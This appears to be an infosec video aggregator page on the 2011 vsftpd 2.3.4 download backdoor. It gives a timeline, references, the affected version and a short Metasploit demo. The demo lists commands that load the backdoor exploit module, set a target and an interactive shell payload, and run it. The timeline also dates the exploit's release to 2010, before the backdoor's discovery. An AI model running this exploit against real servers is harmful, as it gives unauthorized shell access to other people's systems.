Description: Timeline :
Backdoor discovered by Mathias Kresin
Source code correction the 2011-07-03
Metasploit exploit released the 2010-07-04
Provided by:
hdm
References :
http://pastebin.com/AetT9sS5
http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoor...
http://download.polytechnic.edu.na/pub2/vsftpd/
Affected versions :
vsftpd-2.3.4 from 2011-06-30
Tested on Ubuntu Lucid 10.04.1 LTS with vsftpd-2.3.4
Thanks for the diffs :)
Description:
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was present in the vsftpd-2.3.4.tar.gz archive sometime before July 3rd 2011.
Metasploit demo :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a
Tags: metasploit vsftpd backdoor linux ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.